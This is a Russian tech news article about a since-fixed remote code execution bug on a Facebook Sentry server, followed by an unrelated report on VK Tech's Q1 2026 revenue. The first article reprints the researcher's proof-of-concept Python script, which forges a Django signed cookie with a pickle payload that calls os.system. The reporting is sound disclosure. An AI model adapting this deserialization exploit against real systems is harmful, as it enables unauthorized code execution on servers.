Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Альтернативы Active Directory: как пройти миграцию без боли?
Регистрируйтесь на эфир!

Екатерина Быстрова 14 Мая 2026 - 11:20

Корпорации VK Tech

Выручка VK Tech выросла на 58,9% и до 4,3 млрд рублей за квартал

VK Tech опубликовала неаудированные финансовые результаты за первый квартал 2026 года. Выручка компании выросла на 58,9% год к году и достигла 4,3 млрд рублей против 2,7 млрд рублей годом ранее. Скорректированная EBITDA увеличилась скромнее — на 8,8%, до 280 млн рублей.

Операционные расходы при этом выросли на 64,2%, до 4 млрд рублей. В компании объясняют это, в частности, снижением доли капитализируемых затрат по мере взросления продуктового портфеля.

Основную часть выручки VK Tech составляют регулярные поступления. Рекуррентная выручка выросла на 84,7% год к году, до 3,7 млрд рублей. Её доля в общей выручке достигла 87%, что на 12,1 процентного пункта выше показателя прошлого года.

Рост обеспечили как крупные заказчики, так и клиенты среднего и малого бизнеса. Выручка от крупных клиентов увеличилась на 40,7%, а от среднего и малого бизнеса — на 93,6%.

Самым быстрорастущим направлением стали сервисы продуктивности VK WorkSpace. Их выручка выросла в 2,3 раза и составила 1,9 млрд рублей. В компании связывают динамику с ростом продаж по облачной модели: выручка On-Cloud в этом направлении увеличилась почти втрое. Средняя ежемесячная аудитория активных пользователей платных учётных записей On-Cloud выросла на 23%.

Выручка направления «Облачная платформа» увеличилась на 19%, до 1,5 млрд рублей. В его состав входит VK Cloud — платформа с облачными сервисами для ИТ-инфраструктуры, разработки и работы с данными.

Дата-сервисы принесли 318 млн рублей, что на 58% больше, чем годом ранее. Рост обеспечили Tarantool и VK Data Platform: их выручка увеличилась в 3,3 раза.

Бизнес-приложения показали выручку 409 млн рублей. В это направление входят решения для налогового мониторинга, анализа бизнес-процессов и автоматизации HR-функций. При этом значительная часть продаж таких продуктов приходится на модель On-Premise, выручка по которой обычно формируется во втором полугодии.

С начала 2026 года VK Tech выделила ИИ-решения в отдельное направление. В первом квартале оно принесло 185 млн рублей. К этому блоку относится VK AI Space — платформа для разработки и запуска ИИ-агентов в защищённом контуре клиента.

В марте VK Tech также приобрела CedrusData, разработчика решений для работы с большими данными. В компании рассчитывают использовать эту сделку для развития продуктов в области хранения, обработки и анализа данных, а также ИИ.

Среди заметных запусков и обновлений первого квартала — механизм автоматического охлаждения данных в Tarantool Column Store, запуск Registry для хранения артефактов разработки, а также защита бэкапов в VK Cloud от удаления и шифрования вирусами-вымогателями.

Альтернативы Active Directory: как пройти миграцию без боли?
Регистрируйтесь на эфир!